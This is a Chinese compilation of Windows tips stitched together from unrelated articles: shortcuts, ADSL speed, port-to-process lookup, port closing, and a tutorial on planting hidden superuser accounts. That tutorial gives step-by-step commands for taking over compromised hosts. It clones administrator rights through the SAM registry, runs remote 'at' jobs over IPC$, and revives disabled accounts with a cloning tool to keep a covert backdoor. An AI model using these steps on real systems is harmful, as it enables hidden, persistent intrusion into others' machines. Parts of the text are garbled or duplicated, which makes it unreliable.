WINDOWS常用命令和快捷键大全

黑客常用命令和快捷键大全

很多用户可能都知道在DOS模式下可以进行命令行的黑客命令操作，可总有用户不知道从哪里下手，看了下文您应该可以有一点启示：

*net user 查看用户列表

*net user 用户名 密码 /add 添加用户

*net user 用户名 密码 更改用户密码

*net localgroup administrators 用户名 /add 添加用户到管理组

*net user 用户名 /delete 删除用户

*net user 用户名 查看用户的基本情况

*net user 用户名 /active:no 禁用该用户

*net user 用户名 /active:yes 启用该用户

*net share 查看计算机IPC$共享资源

*net share 共享名 查看该共享的情况

*net share 共享名=路径 设置共享。例如 net share c$=c:

*net share 共享名 /delete 删除IPC$共享

*net use 查看IPC$连接情况

*net use //ip/ipc$Content$nbsp;"密码" /user:"用户名" ipc$连接

*net time //ip 查看远程计算机上的时间

*copy 路径:/文件名 //ip/共享名 复制文件到已经ipc$连接的计算机上

*net view ip 查看计算机上的共享资源

*ftp 服务器地址 进入FTP服务器

*at 查看自己计算机上的计划作业

*at //ip 查看远程计算机上的计划作业

*at //ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

*at //ip 计划作业ID /delete 删除远程计算机上的一个计划作业

*at //ip all /delete 删除远程计算机上的全部计划作业

一、常见用法：

F1 显示当前程序或者windows的帮助内容。

F2 当你选中一个文件的话，这意味着“重命名”

F3 当你在桌面上的时候是打开“查找：所有文件” 对话框

F10或ALT 激活当前程序的菜单栏

windows键或CTRL+ESC 打开开始菜单

CTRL+ALT+DELETE 在win9x中打开关闭程序对话框

DELETE 删除被选择的选择项目，如果是文件，将被放入回收站

SHIFT+DELETE 删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站

CTRL+N 新建一个新的文件

CTRL+O 打开“打开文件”对话框

CTRL+P 打开“打印”对话框

CTRL+S 保存当前操作的文件

CTRL+X 剪切被选择的项目到剪贴板

CTRL+INSERT 或 CTRL+C 复制被选择的项目到剪贴板

SHIFT+INSERT 或 CTRL+V　粘贴剪贴板中哪谌莸降鼻拔恢?

ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作

ALT+SHIFT+BACKSPACE 重做上一步被撤销的操作

Windows键+M 最小化所有被打开的窗口。

Windows键+CTRL+M 重新将恢复上一项操作前窗口的大小和位置

Windows键+E 打开资源管理器

Windows键+F 打开“查找：所有文件”对话框

Windows键+R 打开“运行”对话框

Windows键+BREAK 打开“系统属性”对话框

Windows键+CTRL+F 打开“查找：计算机”对话框

SHIFT+F10或鼠标右击 打开当前活动项目的快捷菜单

SHIFT 在放入CD的时候按下不放，可以跳过自动播放CD。在打开word的时候按下不放，可以跳过自启动的宏

ALT+F4 关闭当前应用程序

ALT+SPACEBAR 打开程序最左上角的菜单

ALT+TAB 切换当前程序

ALT+ESC 切换当前程序

ALT+ENTER 将windows下运行的MSDOS窗口在窗口和全屏幕状态间切换

PRINT SCREEN 将当前屏幕以图象方式拷贝到剪贴板

ALT+PRINT SCREEN 将当前活动程序窗口以图象方式拷贝到剪贴板

CTRL+F4 关闭当前应用程序中的当前文本(如word中)

CTRL+F6 切换到当前应用程序中的下一个文本(加shift 可以跳到前一个窗口)

在IE中：

ALT+RIGHT ARROW 显示前一页(前进键)

ALT+LEFT ARROW 显示后一页(后退键)

CTRL+TAB 在页面上的各框架中切换(加shift反向)

F5 刷新

CTRL+F5 强行刷新

目的快捷键

激活程序中的菜单栏 F10

执行菜单上相应的命令 ALT+菜单上带下划线的字母

关闭多文档界面程序中的当

前窗口 CTRL+ F4

关闭当前窗口或退出程序 ALT+ F4

复制 CTRL+ C

剪切 CTRL+ X

删除 DELETE

显示所选对话框项目的帮助 F1

显示当前窗口的系统菜单 ALT+空格键

显示所选项目的快捷菜单 SHIFT+ F10

显示“开始”菜单 CTRL+ ESC

显示多文档界面程序的系统

菜单 ALT+连字号(-)

粘贴 CTR L+ V

切换到上次使用的窗口或者

按住 ALT然后重复按TAB，

切换到另一个窗口 ALT+ TAB

撤消 CTRL+ Z

二、使用“Windows资源管理器”的快捷键

目的快捷键

如果当前选择展开了，要折叠或者选择父文件夹左箭头

折叠所选的文件夹 NUM LOCK+负号(-)

如果当前选择折叠了，要展开

或者选择第一个子文件夹右箭头

展开当前选择下的所有文件夹 NUM LOCK+*

展开所选的文件夹 NUM LOCK+加号(+)

在左右窗格间切换 F6

三、使用 WINDOWS键

可以使用 Microsoft自然键盘或含有 Windows徽标键的其他任何兼容键盘的以下快捷键。

目的快捷键

在任务栏上的按钮间循环 WINDOWS+ TAB

显示“查找：所有文件” WINDOWS+ F

显示“查找：计算机” CTRL+ WINDOWS+ F

显示“帮助” WINDOWS+ F1

显示“运行”命令 WINDOWS+ R

显示“开始”菜单 WINDOWS

显示“系统属性”对话框 WINDOWS+ BREAK

显示“Windows资源管理器” WINDOWS+ E

最小化或还原所有窗口 WINDOWS+ D

撤消最小化所有窗口 SHIFT+ WINDOWS+ M

四、使用“我的电脑”和“Windows资源管理器”的快捷键

目的快捷键

关闭所选文件夹及其所有父

文件夹按住 SHIFT键再单击“关闭按钮(仅适用于“我的电脑”)

向后移动到上一个视图 ALT+左箭头

向前移动到上一个视图 ALT+右箭头

查看上一级文件夹 BACKSPACE

五、使用对话框中的快捷键

目的快捷键

取消当前任务 ESC

如果当前控件是个按钮，要单击该按钮或者如果当前控件是个复选框，要选择或清除该复选框或者如果当前控件是个选项按钮，要单击该选项空格键

单击相应的命令 ALT+带下划线的字母

单击所选按钮 ENTER

在选项上向后移动 SHIFT+ TAB

在选项卡上向后移动 CTRL+ SHIFT+ TAB

在选项上向前移动 TAB

在选项卡上向前移动 CTRL+ TAB

如果在“另存为”或“打开”对话框中选择了某文件夹，要打开上一级文件夹 BACKSPACE

在“另存为”或“打开”对话框中打开“保存到”或“查阅” F4

刷新“另存为”或“打开”对话框 F5

六、使用“桌面”、“我的电脑”和“Windows资源管理器”快捷键

选择项目时，可以使用以下快捷键。

目的快捷键

插入光盘时不用“自动播放”

功能按住 SHIFT插入 CD-ROM

复制文件按住 CTRL拖动文件

创建快捷方式按住 CTRL+SHIFT拖动文件

立即删除某项目而不将其放入 SHIFT+DELETE

“回收站”

显示“查找：所有文件” F3

显示项目的快捷菜单 APPLICATION键

刷新窗口的内容 F5

重命名项目 F2

选择所有项目 CTRL+ A

查看项目的属性 ALT+ ENTER或 ALT+双击

可将 APPLICATION键用于 Microsoft自然键盘或含有 APPLICATION键的其他兼容键

　

　七、Microsoft放大程序的快捷键

这里运用Windows徽标键和其他键的组合。

快捷键目的

Windows徽标+PRINT SCREEN将屏幕复制到剪贴板(包括鼠标光标)

Windows徽标+SCROLL LOCK将屏幕复制到剪贴板(不包括鼠标光标)

Windows徽标+ PAGE UP切换反色。

Windows徽标+ PAGE DOWN切换跟随鼠标光标

Windows徽标+向上箭头增加放大率

Windows徽标+向下箭头减小放大率

八、使用辅助选项快捷键

目的快捷键

切换筛选键开关右SHIFT八秒

切换高对比度开关左ALT+左SHIFT+PRINT SCREEN

切换鼠标键开关左ALT+左SHIFT+NUM LOCK

切换粘滞键开关 SHIFT键五次

切换切换键开关 NUM LOCK五秒

宽带到底该有多快 揭开ADSL真正速度之谜



揭开真正速度之谜

经常使用ADSL的用户，你知道ADSL的真正速度吗？带着这个疑问我们将问题一步一步展开。

很多用户反映，ADSL下载速率并没有达到标称的512K，脑通过ADSL接入网络后，下载时会出现一个下载速率指示条，上面显示的下载速率一般为50 KByte／s左右！这其实是个换算关系不清引起的误会。

1，512K ADSL是什么意思？

512K=512Kbps=512K bits/s=64K bytes/s

我想这个换算应该没什么问题。

2，64K bytes/s意味着什么？

这个64K的真正含义是“个人用户所能独享的最大下载带宽”

那么这又是什么意思呢，不知道现在有没有人注意过电信ADSL安装的申请表，上面的带宽项目写的是都是“不高于512K”，“不高于8M”等等，也就是说我们在正常的情况下可以拥有最多不超过64K的专有带宽。

注意是“不高于”，那么也就是说很多时候我们的专有带宽可能小于64K，那有又是为什么呢？

事实上，中国电信的ADSL是运行在ATM上面，ATM到chinanet边缘路由器带宽是155M，每一个边缘路由器可以连接3000用户，如果这些用户同时上网，那么每个用户其实只有50k bit/s的带宽，也就是7K bytes/s，加上路由器衰减，那么最终可能只有普通modem的速度了。

当然以上只是假想的情况，毕竟3000人同时连在一台边缘路由器上面几乎是不可能的，电信也不会让路由器满负荷连接而使得速度下降如此之巨。

但是，64K是最高专有带宽是毋庸置疑的。

3，那为什么我的512K ADSL经常可以达到100K甚至200K以上的下载速度呢？

我们搞清楚了64K是最大专有带宽，但不等于最大带宽，事实上在ADSL拨号时已经分配了实际约等于8Mbps，也就是1M bytes/s的下载带宽，只不过电信限制了我们的专有带宽最高64K，那么当路由器连接的用户较少的时候，我们可以获

得一部分超过专有带宽的共享带宽(显然电信没必要让这些带宽闲置)，当然512K速率的ADSL永远不可能通过占用共享带宽达到1M/s的下载速度，因为毕竟总还是有很多人在同时上网，而且电信肯定还有一些平衡负载的机制。

4，ADSL上传速度对下载的影响

TCP/IP规定，每一個封包，都需要有acknowledge讯息的回传，也就是说，传输的资料，需要有一个收到资料的讯息回复，才能决定后面的传输速度，並决定是否重新传输遗失的资料。

上行的带宽一部分就是用來传输這些acknowledge(确认)資料的，当上行负载过大的时候，就会影响acknowledge资料的传送速度，并进而影响到下载速度。这对非对称数字环路也就是ADSL这种上行带宽远小于下载带宽的连接来说影响尤为明显。

有试验证明，当上传满载时，下载速度讲变为理想速度的40%，这就可以解释为什么为什么很多朋友用BT下载的时候稍微限速反而能够获得更大的下载速度。

既然这样我们就不能要求所有的人都不限速，因为对于ADSL用户来说这是很不现实的，也是不科学的。适当的限速是正确的。

5，ADSL的速度随着连接时间的延长而逐渐降低。

前面说过ADSL再拨号的时候会建立最高理论8Mbps的下载带宽，这个带宽是永远不会改变的！不过实际上由于ADSL的噪声检测机制如果线路情况不好那么一开始建立的连接显然不可能达到理论值，可能最后是5Mbps，这个带宽也是不会改变的。

那为什么说ADSL的速度会越来越慢呢？

这是因为即使用户不关闭调制解调器的电源，有时ADSL链接也会随时中断。比如，在通信状态因噪音增加而恶化，频繁发生错误的情况下。 链接中断后，马上就会重新进行调试，并重新确定链接。不过，如果此时致使链接中断的噪音仍然存在的话，(这一般是比较大的)重新链接后的速度就会比原来更低。由于调试中所确定的链接速度是也固定的，因此即便之后噪音消失以后，链接速度也不会提高。ADSL调制解调器使用时间越长，发生这种情况的可能性就越高，所以连接速度越来越慢。

此时，如果用户重新起动调制解调器，链接就会重新确立，速度就可能由此得以提高。这一常识可用作链接速度降低后的处理对策.

当然上面说的这些情况都只是根据ADSL连接本身来讨论的，实际的情况还包括互联网状况，网站本身的响应等等。

了解了上面的知识，您或许就豁然开朗。原来512K并不是512KB呀，只有64KB，呜呜~~~你也不可能达到每秒512KB的下载速度。

真正实现ADSL的高速

解决ADSL速度时最要重视的一点就是用户主机要达到

一定的配置，才能在硬件上保证ADSL接入的速度。俗话说“没有金刚钻，不揽瓷器活”，如果个人电脑的处理性能高，就可以快速运行Web浏览器与邮件软件，提高上网速度。如果安装了1Mbps的ADSL，但个人电脑却只能装Windows95或98的话，当然会觉得速度慢。尤其是内存如果只有64MB或128MB，宽带就犹如英雄无用武之处。如果更新了个人电脑，操作系统可以使用WindowsXP的话，那自然宽带接入的速度就会提高。另外，WindowsXP比原来的Windows系统需要更多的内存，建议最少也要有256MB以上的内存。如果没有能力更新个人电脑，那就增加内存，只要增加内存就能感觉到速度提高。此外，宽带接入使用的ADSL调制解调器也要支持高速度，才可以保证接入速度。

还有一些在硬件上对ADSL维护的方法，例如尽量缩短电话插座与ADSL调制解调器之间的电话线，可以尽量减少线路损耗，具体操作可以缩短电话插座与ADSL调制解调器之间的距离、加长连接调制解调器与个人电脑的网线，就不会降低速度。还有在ADSL调制解调器附近不要放置散发电磁波的办公设备(包括个人电脑)或者电视、冰箱等家电、手机都会给调制解调器带来干扰。

熟悉电脑的人都该知道，个人电脑的性能不仅取决于自身的硬件基础，后期对电脑的软件优化也同样可以成为网络飞翔的动力。一方面，系统自身的性能就可以通过现在多的有些“泛滥”的系统优化软件来提高，CPU的空置率，内存的使用率，硬盘的碎片清理等等，都可以通过软件的力量完成提高。另一方面，在宽带接入联接网络时，同样可以利用一些专门的软件进行优化，对一些网络联接设置进行随机调整，以达到最好的连接效果。

联

寻找端口与进程的关联



如果发现一些从没见过的端口号，你怎样分辨出该端口是不是木马开放的端口?或者在进程列表中发现陌生的进程时，是否想知道该进程在你的系统中开了什么端口?
一、根据进程查端口号

首先在开始菜单的“运行”框中输入“cmd.exe”进入命令提示符窗口，先键入“tasklist”命令将列出系统正在运行的进程列表，把你要查的进程所对应的“PID”号记下或复制。

小资料：单击右键菜单中的标记，然后将你要查的进程对应的“PID”号选中，按一下“回车”键就可以了。需要注意的是，相同的进程 图像名　每次运行的“PID”号一般都不会相同，所以一旦该进程重启后，该“PID”号就会改变，这就需要重新查看。

把进程的PID号记下后，接下来就用这个PID号把该进程所开的端口显示出来了。

在当前的命令符下继续键入“netstat -ano | findstr 114

0”命令，其中“netstat -ano”参数表示以数字形式显示所有活动的TCP连接以及计算机正在侦听的TCP、UDP端口 并且显示对应的进程ID PID　号；“|findstr 1140”表示查找进程PID为“1140”的TCP连接以及TCP、UDP端口的侦听情况（在实际应用中，需要把你刚才记下或复制的PID号替换掉这里的1140）。按“回车”键后，就会显示出该进程所开的端口号。

从图1中我们可以明显地看出，PID为“1140”的进程所开启的端口为“3001”，如果此时没有任何提示信息返回，则说明该进程没有开启任何端口。
二、根据端口号查进程

在命令提示符窗口中输入“netstat -ano”命令，列出系统当前的端口列表，该命令的作用已在上面提过了。-o参数的作用主要是显示各端口对应的进程PID号，现在把你要查的端口对应的进程PID号记下或复制。然后在命令提示符下继续输入“tasklist /fi ″PID eq 788 ″”（在实际应用中，需要把你复制或记下的PID号替换掉这里的788），这行语句“/fi”参数表示在“tasklist”中筛选，而“PID eq 788”则是指定筛选的条件，按“回车”键后，就会显示出端口对应的进程。

从图2中可以看出，PID号为“788”所对应的进程为“svchost.exe”，如果你查的端口没有关联任何进程的话，此时就会返回“没有运行带有指定标准的任务”的提示信息。

三、查出进程对应的程序

知道了端口和进程的关联后，如何再进一步查出该进程是那个软件或程序的进程呢?

下面的操作就需要用到Windows 2000（Server或Professional版都可以）安装光盘中的一个工具。

首先在安装光盘的“Support\Tools\”目录下，用解压软件打开“support.cab”压缩包，找到“tlist.exe”文件，将此文件释放到任一目录，如“D：\Support”。然后在命令提示符窗口中切换到此目录，运行“tlist.exe”命令，把要查的进程对应的PID号记下或复制（第一列就是进程的PID号），然后继续输入“tlist.exe 2012”命令（你输入的时候，需要将刚才记下的PID号替换掉这里的2012），“CmdLine ”后面显示的就是该进程对应的软件所在的目录。

除此之外，返回信息中还列出了该进程所调用的文件，得到了这些信息就可以很容易查出进程对应的程序了。

假如想关闭某个进程，可把该进程的PID号记下，在命令提符下输入“taskkill /pid 2400” 2400是PID号）就可以将PID号为2400的进程关闭，如果要强制关闭该进程，只须在这条命令的后面加个“/f”参数即可。


系统中多种隐藏超级用户的方法

向你介绍系统中多种隐藏超级用户的方法



一、如何在图形界面建立隐藏的超级用户

图形

界面下适用本地或开3389终端服务的肉鸡上。因为Windows2000有两个注册表编辑器：regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序，修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。NT/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下，但是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下：

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户：hacker$，这里我在命令行下建立这个帐户：

net user hacker$Content$nbsp;1234 /add

2、在开始/运行中输入：regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制”。这里需要说明一下：最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入“regedit.exe”回车，启动注册表编辑器regedit.exe。打开键：

HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键“F”的值复制，并覆盖hacker$对应的项00000409下的键“F”的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$Content$nbsp;/del将用户hacker$删除：

net user hacker$Content$nbsp;/del

7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。

二、如何在命令行下远程建立

隐藏的超级用户

在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。

对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。

1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。)

2、先与肉鸡建立连接,命令为：net use 13.50.97.238ipc$Content$nbsp;"12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动)：

at 13.50.97.238 12:51 c:\winntsystem32net.exe user hacker$Content$nbsp;1234 /add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值：

at 13.50.97.238 12:55 c:\winntregedit.exe /e hacker.reg

HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

/e 是regedit.exe的参数，在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将“c:\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：

copy 13.50.97.238admin$system32hacker.reg c:\hacker.reg

修改的方法图形界中已经介绍过了，这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上

copy c:\hacker.reg 13.50.97.238admin$system32hacker1.reg

7、查看肉鸡时间：net time 13.50.97.238 然后用at命令将用户hacker$删除：

at 13.50.97.238 13:40 net user hacker$Content$nbsp;/del

8、验证hacker$是否删除：用

net use 13.50.97.238 /del 断开与肉鸡的连接。

net use 13.50.97.238ipc$Content$nbsp;"1234" /user:"hacker$" 用帐户hacker$与肉鸡连接，不能连接说明已删除。

9、再与肉鸡建立连接：net use 13.50.97.238ipc$Content$nbsp;"12345678" /user:"administrator"再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表：

at 13.50.97.238 13:41 c:winnt

regedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办？

这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。

是这里有两个前提：1、先用net use 肉鸡ipipc$Content$nbsp;"密码" /user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务(没有开启的话，你也可以远程开启，因为你有超级用户的密码了)。

四、利用被禁用的帐户建立隐藏的超级用户

1、想办查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下，我还没有想到好的办法，只能在命令行下用命令：“net user 用户名”一个一个来查看用户是否被禁用。

2.在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker 克隆成超级用户(克隆之后，被禁用的用户hacker就会自动被激活了)： CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。

3.如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令：

net user hacker /active:no

这样用户hacker就被禁用了(至少表面上是这样的)，当然你也可以将用户hacher换成其它的被禁用的用户。

4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令：net user 肉鸡ipipc$Content$nbsp;"hacker密码" /user:"hacker" 连一连看看。我可以

告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。

5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式：at 肉鸡ip 时间 net user hacker /active:no

6.原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的“F”键被超级用户administrator在注册表的“F”键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内“C”健还是原来的“C”键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。

五、注意的几点事项

1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。

2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份，呵呵。SAM键是毕竟系统最敏感的部位。


怎样关闭端口


每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要，关掉端口也就是关闭无用的服务。“控制面板”的“管理工具”中的“服务”中来配置。

1、关闭7.9等等端口：关闭SimpleTCP/IPService,支持以下TCP/IP服务：CharacterGenerator,Daytime,Discard,Echo,以及QuoteoftheDay。

2、关闭80口：关掉WWW服务。在“服务”中显示名称为"WorldWideWebPublishingService"，通过Internet信息服务的管理单元提供Web连接和管理。

3、关掉25端口：关闭SimpleMailTransportProtocol(SMTP)服务，它提供的功能是跨网传送电子邮件。

4、关掉21端口：关闭FTPPublishingService,它提供的服务是通过Internet信息服务的管理单元提供FTP连接和管理。

5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。

6、还有一个很重要的就是关闭server服务，此服务提供RPC支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享，比如ipc$、c$、admin$等等，

此服务关闭不影响您的共他操作。

7、还有一个就是139端口，139端口是NetBIOSSession端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机，现在好了。关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。对于个人用户来说，可以在各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动，端口也开放了。

每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要，关掉端口也就是关闭无用的服务。

“控制面板”的“管理工具”中的“服务”中来配置。

1、关闭7.9等等端口：关闭SimpleTCP/IPService,支持以下TCP/IP服务：CharacterGenerator,Daytime,Discard,Echo,以及QuoteoftheDay。

2、关闭80口：关掉WWW服务。在“服务”中显示名称为"WorldWideWebPublishingService"，通过Internet信息服务的管理单元提供Web连接和管理。

3、关掉25端口：关闭SimpleMailTransportProtocol(SMTP)服务，它提供的功能是跨网传送电子邮件。

4、关掉21端口：关闭FTPPublishingService,它提供的服务是通过Internet信息服务的管理单元提供FTP连接和管理。

5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。

6、还有一个很重要的就是关闭server服务，此服务提供RPC支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享，比如ipc$、c$、admin$等等，此服务关闭不影响您的共他操作。

7、还有一个就是139端口，139端口是NetBIOSSession端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机，现在好了。

关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。

对于个人用户来说，可以在各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动，端口也开放了。

我们一般采用一些功能强大的反黑软件和防火墙来保证我们的系统安全，但是有些用户不具备上述条件。怎么办呢？下面就介绍一种简易的办法——通过限制端口来帮助大家防止非法入侵。

非法入侵

的方式

简单说来，非法入侵的方式可粗略分为4种：

1、扫描端口，通过已知的系统Bug攻入主机。

2、种植木马，利用木马开辟的后门进入主机。

3、采用数据溢出的手段，迫使主机提供后门进入主机。

4、利用某些软件设计的漏洞，直接或间接控制主机。

非法入侵的主要方式是前两种，尤其是利用一些流行的黑客工具，通过第一种方式攻击主机的情况最多、也最普遍；而对后两种方式来说，只有一些手段高超的黑客才利用，波及面并不广泛，而且只要这两种问题一出现，软件服务商很快就会提供补丁，及时修复系统。

因此，如果能限制前两种非法入侵方式，就能有效防止利用黑客工具的非法入侵。而且前两种非法入侵方式有一个共同点，就是通过端口进入主机。

端口就像一所房子(服务器)的几个门一样，不同的门通向不同的房间(服务器提供的不同服务)。我们常用的FTP默认端口为21，而WWW网页一般默认端口是80。但是有些马虎的网络管理员常常打开一些容易被侵入的端口服务，比如139等；还有一些木马程序，比如冰河、BO、广外等都是自动开辟一个您不察觉的端口。那么，只要我们把自己用不到的端口全部封锁起来，不就杜绝了这两种非法入侵吗？

限制端口的方法

对于个人用户来说，您可以限制所有的端口，因为您根本不必让您的机器对外提供任何服务；而对于对外提供网络服务的服务器，我们需把必须利用的端口(比如WWW端口80、FTP端口21、邮件服务端口25、110等)开放，其他的端口则全部关闭。

这里，对于采用Windows2000或者WindowsXP的用户来说，不需要安装任何其他软件，可以利用“TCP/IP筛选”功能限制服务器的端口。具体设置如下：

1、右键点击“网上邻居”，选择“属性”，然后双击“本地连接”(如果是拨号上网用户，选择“我的连接”图标)，弹出“本地连接状态”对话框。

2、点击[属性]按钮，弹出“本地连接属性”，选择“此连接使用下列项目”中的“Internet协议(TCP/IP)”，然后点击[属性]按钮。

3、在弹出的“Internet协议(TCP/IP)”对话框中点击[高级]按钮。在弹出的“高级TCP/IP设置”中，选择“选项”标签，选中“TCP/IP筛选”，然后点击[属性]按钮。

4、在弹出的“TCP/IP筛选”对话框里选择“启用TCP/IP筛选”的复选框，然后把左边“TCP端口”上的“只允许”选上(请见附图)。

这样，您就可以来自己添加或删除您的TCP或UDP或IP的各种端口了。

添加或者删除完毕，重新启动机器以后，您的服务器就被保护起来了。

如果只上网浏览的话，可以不添加任何端口。但是要利用一些网络联络工具，比如

OICQ的话，就要把“4000”这个端口打开，同理，如果发现某个常用的网络工具不能起作用的时候，请搞清它在您主机所开的端口，然后在“TCP/IP筛选”中添加端口即可。

如何手动关闭端口[图]


方法1 防火墙拦截

因为防火墙有拦截数据的功能，所以如果我们利用该功能将通往135端口的接收和发送数据全部拦截下来，就可以阻止他人连接我们的135端口了~
我们以天网防火墙为例子，因为用的人多，操作也简单，一看就明白了~立刻行动吧！
a.打开天网防火墙，可以见到如图所示的界面，单击“自定义规则”，我们要自己来增加一个规则，
所以再单击“增加规则”。


b.现在可以看到一个增加IP规则的对话框。
规则的名称和说明没有限制，喜欢就好~不过为了方便查看，我们就叫“拦截135端口”
数据包方向：接收或发送（同时阻止通过135端口接收和发送数据）

对方IP地址：任何地址

数据包协议类型：TCP （因为135端口是一种TCP协议端口）

